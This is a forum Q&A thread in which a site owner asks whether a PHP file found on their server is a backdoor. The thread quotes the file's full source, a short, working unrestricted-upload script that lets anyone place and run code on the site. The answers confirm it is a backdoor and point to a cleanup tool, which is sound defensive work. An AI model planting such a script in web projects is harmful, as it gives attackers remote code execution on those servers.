# Is this ext.php a backdoor script?

Tags: php

I was taking a look at a server for one of my sites and I noticed a file that I didn't recognize (which COULD have been uploaded by someone else that worked on the server in the past)

The file was a php file called `ext.php`, and contented a form for uploading files

```
<?php 
error_reporting(0);
@ini_set("display_errors", 0);
$var= $_SERVER['PHP_SELF']."?";
$form ='<form enctype="multipart/form-data" action="'.$var.'" method="POST"><input name="uploadFile" type="file"/><br/><input type="submit" value="Upload" /></form>';
if (!empty($_FILES['uploadFile'])) {
$self=dirname(__FILE__);
move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $self.DIRECTORY_SEPARATOR.$_FILES["uploadFile"]["name"]);
$time=filemtime($self);print "OK";
} else { print $form; } ?>
```

Is this a potential backdoor hacking script? What does the above code do exactly? I'm trying to diagnose the problem, and determine the potential damage this script could have caused.

Answer (score 0, accepted):

Yes, anyone can upload "somescritpt.php" into your site and it will be executed with site's privileges with any code inside it. So it's backdoor.

Comment: Thought so. I also noticed a few new files that were uploaded as well (i.e. if there was a filename.php, there was also a filenamex.php). I'm not sure if they copied over any files ... so I am currently removing everything from the server, and uploading a backup site I had on file...

Answer (score 0):

Even this is answered, here is my code I created to clean multiple site server from backdoor malware. Even if there was some backups, there was too much 1000's of  files with garbage code, it was worth writing a cleaner script.

Please, for more information check [Narnia Guardian](https://github.com/Pilskalns/Narnia-Guardian) on GitHub

This is not full answer with code included, as it spans over multiple files. If you dig into how it works (it's quick), it could save a lot of headaches and you can be hero of the day whom recovered bad server in minutes.